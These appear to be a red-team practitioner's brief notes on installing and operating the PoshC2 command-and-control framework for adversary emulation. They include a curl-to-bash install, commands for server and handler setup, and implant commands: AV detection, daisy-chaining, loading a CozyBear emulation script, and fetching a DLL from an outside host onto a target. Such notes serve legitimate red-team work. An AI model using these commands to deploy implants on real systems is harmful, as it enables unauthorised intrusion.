# PoshC2

PoshC2 is pretty well documented; below are my notes. It is best to use the official documentation: <https://poshc2.readthedocs.io/en/latest/>

A demo of PoshC2 is in this [Red Team Village](https://redteamvillage.io/) and [Texas Cyber Summit](https://www.texascybersummit.org/) [June'gle](http://junegle.com/) event:

{% embed url="<https://www.youtube.com/watch?v=Fa4GHF_OVVc>" %}

## Install PoshC2

```
sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
```

## Configure and Run PoshC2

```
sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config
```

Modify the values in the file as needed. Settings to consider: `BindIP`, `PayloadCommsHost`, and `UserAgent`.

### Launch Server

```
sudo su -
posh-server
```

On launch, PoshC2 generates a number of payloads into `/opt/PoshC2_Project` and creates a quick start file.

```
cat /opt/PoshC2_Project/quickstart.txt
```

### Launch Handler

```
sudo su -
posh -u georgy
```

### Deploy Agent

Deploy the agent using any of the methods listed in the `quickstart.txt` file.

## Emulate TTPs

### Run PowerShell Scripts

```
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
detectav
software
```

### Chaining

Run the following command from the implant you want to use as the daisy server.

```
startdaisy
```

### Download a file

```
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
```

## Other Resources

* <https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/>
* <https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/>

